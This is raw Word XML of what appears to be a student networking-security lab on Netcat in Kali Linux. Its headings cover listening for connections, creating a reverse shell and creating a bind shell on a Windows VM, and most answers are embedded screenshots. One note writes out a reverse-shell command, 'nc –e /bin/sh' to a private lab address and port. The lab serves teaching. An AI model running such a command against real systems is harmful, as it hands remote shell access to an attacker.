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63" w:rsidRPr="00571359" w:rsidRDefault="00D025A6" w:rsidP="00571359">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="12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025A6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use Netcat (nc) in Kali :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D7A63" w:rsidRPr="00571359" w:rsidRDefault="006D7A63" w:rsidP="00571359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71359">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">First we find our IP address </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D7A63" w:rsidRPr="00D025A6" w:rsidRDefault="006D7A63" w:rsidP="00571359">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="12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71359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>
            <wp:extent cx="5943600" cy="38859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5A6" w:rsidRPr="00571359" w:rsidRDefault="00D025A6" w:rsidP="005713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025A6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Listen for incoming connections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE753B" w:rsidRPr="00571359" w:rsidRDefault="00FE753B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71359">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D025A6" w:rsidRPr="00571359" w:rsidRDefault="001E68E9" w:rsidP="00571359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71359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>
            <wp:extent cx="2686050" cy="1136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53B" w:rsidRPr="00571359" w:rsidRDefault="00FE753B" w:rsidP="00571359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71359"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30790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53B" w:rsidRPr="00571359" w:rsidRDefault="00FE753B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71359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>
            <wp:extent cx="5943600" cy="21867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A63" w:rsidRPr="00571359" w:rsidRDefault="006D7A63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71359">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00571359">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: “nc” is used for netcat, “-l” is used for listening for incoming connections,  “-p” is used for specifying a port, “-v” is used to wri</w:t>
      </w:r>
      <w:r w:rsidR="00AD5638" w:rsidRPr="00571359">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>te the data in linux.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD5638" w:rsidRPr="00571359" w:rsidRDefault="00AD5638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AD5638" w:rsidRPr="00571359" w:rsidRDefault="00AD5638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AD5638" w:rsidRPr="00571359" w:rsidRDefault="00AD5638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AD5638" w:rsidRDefault="00AD5638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571359" w:rsidRPr="00571359" w:rsidRDefault="00571359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AD5638" w:rsidRPr="00D025A6" w:rsidRDefault="00AD5638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D025A6" w:rsidRPr="00571359" w:rsidRDefault="00D025A6" w:rsidP="005713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025A6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Creating Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D025A6" w:rsidRPr="00571359" w:rsidRDefault="00D025A6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71359">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571359" w:rsidRDefault="00571359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71359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>
            <wp:extent cx="5937250" cy="37846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59" w:rsidRDefault="00571359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367C4C" w:rsidRDefault="00007514" w:rsidP="00571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>
            <wp:extent cx="5943600" cy="17232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4C" w:rsidRDefault="00367C4C" w:rsidP="000075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67C4C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NOTE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: I have used the nc –e </w:t>
      </w:r>
      <w:r w:rsidR="00007514">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/bin/sh 192.168.44</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00007514">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28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07514">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5555</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00007514" w:rsidRDefault="00007514" w:rsidP="000075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007514" w:rsidRDefault="00007514" w:rsidP="000075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007514" w:rsidRPr="00D025A6" w:rsidRDefault="00007514" w:rsidP="000075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D025A6" w:rsidRPr="00571359" w:rsidRDefault="00D025A6" w:rsidP="005713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5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025A6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Create bind shell on your Windows VM. Try to connect to it from Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D025A6" w:rsidRPr="00D025A6" w:rsidRDefault="00D025A6" w:rsidP="00367C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71359">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947635" w:rsidRDefault="00D025A6" w:rsidP="00571359">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="12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025A6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00947635" w:rsidRPr="00947635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>
            <wp:extent cx="5937250" cy="3784600"/>
            <wp:effectExtent l="19050" t="0" r="635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635" w:rsidRDefault="00947635" w:rsidP="00571359">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="12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D025A6" w:rsidRDefault="00007514" w:rsidP="00571359">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="12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>
            <wp:extent cx="5943600" cy="21315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14" w:rsidRPr="00D025A6" w:rsidRDefault="00007514" w:rsidP="00571359">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="12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D25668" w:rsidRPr="00571359" w:rsidRDefault="00947635" w:rsidP="00571359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D25668" w:rsidRPr="00571359" w:rsidSect="00D4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4054"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="65A0213E"/>
    <w:lvl w:ilvl="0" w:tplc="82C8A312">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1-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>
    <w:nsid w:val="5054770A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E90FDD4"/>
    <w:lvl w:ilvl="0" w:tplc="8F4CF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02E4D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="432C570E"/>
    <w:lvl w:ilvl="0" w:tplc="A40CCA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C052E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4930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D381D"/>
    <w:rsid w:val="00007514"/>
    <w:rsid w:val="001E68E9"/>
    <w:rsid w:val="00367C4C"/>
    <w:rsid w:val="003B0442"/>
    <w:rsid w:val="00571359"/>
    <w:rsid w:val="006D7A63"/>
    <w:rsid w:val="007D381D"/>
    <w:rsid w:val="007E6BDE"/>
    <w:rsid w:val="00947635"/>
    <w:rsid w:val="009605A8"/>
    <w:rsid w:val="00AD5638"/>
    <w:rsid w:val="00D025A6"/>
    <w:rsid w:val="00D45C33"/>
    <w:rsid w:val="00EC0544"/>
    <w:rsid w:val="00FE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jalalzoy</dc:creator>
  <cp:lastModifiedBy>jalalzoy</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-14T13:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-14T19:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>